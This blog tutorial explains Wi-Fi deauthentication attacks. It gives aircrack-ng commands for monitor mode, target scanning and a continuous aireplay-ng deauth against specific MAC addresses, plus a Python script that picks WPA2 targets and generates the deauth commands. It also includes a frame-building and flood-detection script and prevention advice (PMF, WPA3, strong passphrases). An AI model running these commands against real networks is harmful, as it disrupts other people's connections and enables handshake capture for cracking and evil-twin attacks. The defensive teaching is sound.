In this blog we are going to look at a Wi-Fi attack called deauthentication. In my humble opinion, when a hacker learns about a new attack, he or she also has an obligation to learn how to prevent it. So this is not going to be a simple how-to; the blog is divided into 4 parts:
What is a Deauth Attack?
Why would you want to attack in that way?
How to do it?
How to prevent the attack and take the necessary precautions?
What is a Deauth Attack?
Deauthentication is a kind of denial-of-service attack that targets the communication between a client and a Wi-Fi access point.
The attacker sends spoofed deauthentication (or disassociation) frames to one or more clients that are currently associated with a particular access point, and those clients drop their connection. Of course, this is useless if no wireless client is associated with the access point at the time (whether a real client or a fake authentication you created yourself).
What makes this attack interesting is that even when a network uses WPA2 encryption, you can deauthenticate any client you like without being connected to the network and without knowing the passphrase.
Why does a deauth attack work on WPA2 encryption?
Encryption in 802.11 covers only the data payload. It does not cover the 802.11 frame headers, and it cannot, because fields in those headers (addresses, frame type and subtype, sequence numbers) are needed for the normal operation of 802.11 traffic.
Management frames, which include deauthentication and disassociation, carry everything they need in that header plus a tiny body (for a deauthentication frame, just a 2-byte reason code). Unless the network uses 802.11w Protected Management Frames (PMF), which is optional in WPA2 and mandatory in WPA3, these frames are neither encrypted nor authenticated, so anyone in radio range can forge one with the access point's MAC address as the source and the client will obey it.
Why would a person attack a network in that way?
A deauth attack is, most of the time, one step of a larger attack. Attackers usually need to knock a client off a network so they can:
- Capture the WPA/WPA2 4-way handshake by forcing a client to reconnect to the network (the captured handshake can then be cracked offline).
- Force users to connect to their own rogue access point (an "evil twin").
- Force users to connect to a captive portal.
You can also deauth clients on your own network for far less serious reasons, like:
- Kick a sibling or a friend off the network because they are slowing your connection down.
- Annoy people for a laugh.
How to Deauth?
For this attack we need a tool called aircrack-ng. aircrack-ng is actually a suite containing many tools for assessing Wi-Fi network security; we will use three of them: airmon-ng, airodump-ng and aireplay-ng.
One last thing: since we are talking about sending packets, we need a wireless adapter that supports both monitor mode and packet injection (many built-in laptop adapters do not).
What is Monitor Mode?
Monitor mode lets you capture every frame transmitted and received by wireless devices and networks nearby, without being associated to any of them. Without it you cannot see which devices are active or what is happening on the network.
What is Packet Injection?
Packet injection lets you craft frames and transmit them to wireless devices and networks nearby. Without it you cannot disrupt or manipulate any traffic on the network.
- Step 1: Set up Kali and open up a Terminal
Type ifconfig and press Enter. In the eth0 section of my ifconfig output you can see inet 10.0.2.15; that is because I am running Kali Linux in a virtual machine attached to a NAT network. Don't worry about it, you do not even have to care! (If you use a VM, a USB wireless adapter must be passed through to the guest; the virtual NIC cannot do monitor mode.)
All you have to worry about is the wlan0 section: that is your wireless adapter, and as you can see mine is not even connected to a network.
- Step 2: Setting the wireless adapter to monitor mode with airmon-ng
Running airmon-ng start wlan0 puts your adapter into monitor mode; the interface is renamed to wlan0mon. If airmon-ng warns that processes such as NetworkManager or wpa_supplicant could cause trouble, run airmon-ng check kill first to stop them.
- Step 3: Searching for Victims with airodump-ng
Run in your terminal => airodump-ng wlan0mon. This lists the nearby access points (BSSID, channel, encryption, ESSID) and, below them, the stations (clients) it has seen and which BSSID each one is associated with. Adding -w scan also writes everything it sees to scan-01.csv and scan-01.cap.
- Step 4: Specific Targeting for better information gathering
Now that we know what we need to know about the target, we have to find the devices connected to it.
The command is airodump-ng --bssid "target's BSSID" -c "target's channel number" -w capture wlan0mon (airodump-ng also accepts -d as the short form of --bssid). Locking onto one BSSID and channel shows only that access point and its clients, and -w writes the capture to a file so that a 4-way handshake can be saved when a client reconnects.
- Step 5: Deauthenticating a device from the network
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon
-0 means deauthentication (the long form is --deauth).
0 is the number of deauths to send; 0 means send them continuously. Use a small number such as 10 if you only want the target to disconnect and reconnect (each count is a burst of 64 frames to the client and 64 to the access point).
-a 50:C7:BF:DC:4C:E8 is the MAC address (BSSID) of the access point we are targeting.
-c E0:B5:2D:EA:18:A7 is the MAC address of the client to deauthenticate; if this is omitted, a broadcast deauth is sent and all clients are deauthenticated.
wlan0mon is the name of the monitor-mode interface.
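Steps 3 to 5 are usually done by reading the airodump-ng screen by eye. The helper below is an added example written for this post (it is not part of aircrack-ng): it parses the CSV that airodump-ng writes when started with -w scan, picks the WPA2 access point for a given ESSID, lists the clients associated with it, flags any open access point broadcasting the same name, and prints the Step 4 and Step 5 command lines. SAMPLE_CSV is constructed to mimic the airodump-ng CSV layout and is not a real capture; the MAC addresses are the ones used in Step 5.

```python
"""Pick the target from airodump-ng's CSV output and build the Step 4/5 commands.

Added example for this post; it is not part of aircrack-ng. It assumes
airodump-ng was started with `-w scan`, which makes it write scan-01.csv in
the layout parsed below. SAMPLE_CSV is constructed to mimic that layout (not a
real capture) and deliberately contains an open access point with the same
ESSID as the WPA2 one, the "evil twin" case this post warns about.
"""
import csv
import io

# Constructed sample in airodump-ng CSV format: an AP table, a blank line,
# then a station table. The field order is the one airodump-ng writes.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
50:C7:BF:DC:4C:E8, 2021-05-01 10:00:00, 2021-05-01 10:05:00,  6, 130, WPA2, CCMP, PSK, -41,      120,        0,   0.  0.  0.  0,   8, HomeWiFi,
AA:BB:CC:DD:EE:01, 2021-05-01 10:00:02, 2021-05-01 10:05:00, 11,  54, OPN ,     ,    , -70,       60,        0,   0.  0.  0.  0,   8, HomeWiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
E0:B5:2D:EA:18:A7, 2021-05-01 10:00:05, 2021-05-01 10:05:00, -50,       33, 50:C7:BF:DC:4C:E8, HomeWiFi
11:22:33:44:55:66, 2021-05-01 10:01:00, 2021-05-01 10:04:00, -60,        5, (not associated), HomeWiFi,CoffeeShop
"""


def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts from airodump-ng CSV text."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue  # blank separator line
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
            continue
        if head == "Station MAC":
            section = "sta"
            continue
        row = [field.strip() for field in row]
        if section == "ap" and len(row) >= 14:
            # Fixed columns: 0 BSSID, 3 channel, 5 privacy, 13 ESSID.
            aps.append({"bssid": row[0], "channel": int(row[3]),
                        "privacy": row[5], "essid": row[13]})
        elif section == "sta" and len(row) >= 6:
            # Probed ESSIDs are comma-joined, so take everything after column 5.
            stations.append({"mac": row[0], "bssid": row[5],
                             "probed": [p for p in row[6:] if p]})
    return aps, stations


def pick_target(text, essid):
    """Choose the WPA/WPA2 AP named `essid`, its clients, and any open twins."""
    aps, stations = parse_airodump_csv(text)
    same_name = [ap for ap in aps if ap["essid"] == essid]
    protected = [ap for ap in same_name if ap["privacy"].startswith("WPA")]
    open_twins = [ap["bssid"] for ap in same_name if ap["privacy"] == "OPN"]
    if not protected:
        return None
    ap = protected[0]
    clients = [s["mac"] for s in stations if s["bssid"] == ap["bssid"]]
    return {"bssid": ap["bssid"], "channel": ap["channel"],
            "clients": clients, "open_twins": open_twins}


def step_commands(target, iface="wlan0mon", count=10):
    """Build the Step 4 (focused capture) and Step 5 (deauth) command lines."""
    cmds = [f"airodump-ng --bssid {target['bssid']} -c {target['channel']} "
            f"-w capture {iface}"]
    for client in target["clients"]:
        cmds.append(f"aireplay-ng -0 {count} -a {target['bssid']} -c {client} {iface}")
    return cmds


if __name__ == "__main__":
    target = pick_target(SAMPLE_CSV, "HomeWiFi")
    if target["open_twins"]:
        print("warning: open AP(s) with the same ESSID:", target["open_twins"])
    print("\n".join(step_commands(target)))
```

Only the WPA/WPA2 access point is chosen as the target: deauthenticating an open network yields no handshake, and an open access point with the same ESSID next to your WPA2 one is exactly the evil twin you should be suspicious of.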
How to prevent the attack and take the necessary precautions?
You are now familiar with the attack and know all the theory a beginner needs. But how can one defend against a deauthentication attack? Without 802.11w Protected Management Frames you cannot stop someone from sending deauth frames; with PMF enabled on both the access point and the client (optional in WPA2, mandatory in WPA3), forged deauthentication frames are dropped because they carry no valid authentication. In either case, make sure your network is configured so that being deauthenticated does not let an attacker compromise it:
- Make sure the network is using WPA2 encryption, with PMF enabled if your equipment supports it, or WPA3.
- Your Wi-Fi passphrase should be long and strong, so that a captured 4-way handshake cannot be cracked offline.
- Once you have been disconnected from your network, make sure you reconnect to your WPA2-protected network and not to an open one with the same name as yours (an evil twin).
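The example below is added for this post and is not aircrack-ng code. It makes the point of the "Why does a deauth attack work on WPA2 encryption?" section concrete by building the 26-byte deauthentication frame byte for byte (a plain 802.11 header plus a 2-byte reason code, nothing encrypted, nothing that needs the network key) and parsing it back, and for the prevention section above it shows the one thing a network owner can still do when PMF is unavailable: count unprotected deauthentication and disassociation frames per sender over a capture and flag a flood. The MAC addresses are the ones from Step 5; SAMPLE_FRAMES is constructed here, not captured from the air.

```python
"""Build, parse and detect 802.11 deauthentication frames.

Added example for this post (not aircrack-ng code). The entire deauth frame
is a 24-byte header plus a 2-byte reason code; none of it is encrypted or,
without 802.11w, authenticated, which is why it works against WPA2.
SAMPLE_FRAMES at the bottom is constructed, not captured.
"""
import struct
from collections import Counter

AP = "50:C7:BF:DC:4C:E8"      # access point BSSID from Step 5
CLIENT = "E0:B5:2D:EA:18:A7"  # client MAC from Step 5

# Frame Control, little-endian: protocol version 0, type 0 (management),
# subtype 12 (deauthentication). On the air this is the two bytes C0 00.
FC_DEAUTH = 0x00C0
FC_PROTECTED = 0x4000   # "Protected Frame" flag; set only with 802.11w/PMF
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
REASON_CLASS3_FROM_NONASSOC = 7  # reason code aireplay-ng puts in its deauths
HEADER = "<HH6s6s6sH"   # FC, duration, addr1 (dst), addr2 (src), addr3 (BSSID), seq ctrl


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_FROM_NONASSOC, seq=0):
    """Return the 26-byte deauthentication frame (FCS excluded) as transmitted.

    Nothing here needs the network key: an attacker fills in the AP's MAC as
    src/bssid and the victim's MAC as dst, exactly like aireplay-ng -0 does.
    """
    header = struct.pack(HEADER, FC_DEAUTH, 0x013A, mac_bytes(dst),
                         mac_bytes(src), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame):
    """Decode a deauth/disassoc frame; return None for any other frame."""
    if len(frame) < 26:
        return None
    fc, _dur, a1, a2, a3, seqctl = struct.unpack(HEADER, frame[:24])
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    protected = bool(fc & FC_PROTECTED)
    # With 802.11w the body is CCMP-encrypted (a CCMP header precedes it), so
    # the reason code is only readable on an unprotected frame.
    reason = None if protected else struct.unpack("<H", frame[24:26])[0]
    return {"kind": "deauth" if subtype == SUBTYPE_DEAUTH else "disassoc",
            "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3),
            "seq": seqctl >> 4, "reason": reason, "protected": protected}


def deauth_flood(frames, threshold=10):
    """Return {(src, bssid): count} for senders of >= threshold unprotected
    deauth/disassoc frames. A single deauth is normal (roaming, AP reboot);
    dozens from one source in a short capture is an aireplay-ng burst."""
    counts = Counter()
    for frame in frames:
        info = parse_mgmt(frame)
        if info and not info["protected"]:
            counts[(info["src"], info["bssid"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


# Constructed traffic sample: a beacon, one legitimate deauth from another AP,
# one PMF-protected deauth, then 32 aireplay-style rounds (AP -> client and
# client -> AP, the pair of frames aireplay-ng sends per round).
OTHER_AP = "AA:BB:CC:DD:EE:02"
BEACON = struct.pack(HEADER, 0x0080, 0, mac_bytes("FF:FF:FF:FF:FF:FF"),
                     mac_bytes(OTHER_AP), mac_bytes(OTHER_AP), 0) + b"\x00" * 12
PMF_DEAUTH = struct.pack(HEADER, FC_DEAUTH | FC_PROTECTED, 0x013A, mac_bytes(CLIENT),
                         mac_bytes(OTHER_AP), mac_bytes(OTHER_AP), 0) + b"\x00" * 10
SAMPLE_FRAMES = [BEACON, build_deauth(CLIENT, OTHER_AP, OTHER_AP, reason=3), PMF_DEAUTH]
for i in range(32):
    SAMPLE_FRAMES.append(build_deauth(CLIENT, AP, AP, seq=i))
    SAMPLE_FRAMES.append(build_deauth(AP, CLIENT, AP, seq=i))

if __name__ == "__main__":
    print("deauth frame on the air:", build_deauth(CLIENT, AP, AP).hex())
    for (src, bssid), n in deauth_flood(SAMPLE_FRAMES).items():
        print(f"possible deauth flood: {n} frames from {src} on BSSID {bssid}")
```

The detector keys on the source address, so a spoofed flood shows up as the access point's own MAC sending dozens of deauths to one client (and the client's MAC sending them back to the access point). On a network with PMF, genuine deauths carry the Protected Frame bit, so any unprotected deauth is forged by definition and can be alerted on at a threshold of one.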
If you have any doubt about deauthentication, don't hesitate to contact us through the given email. Airzero sec will be your digital solution.
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/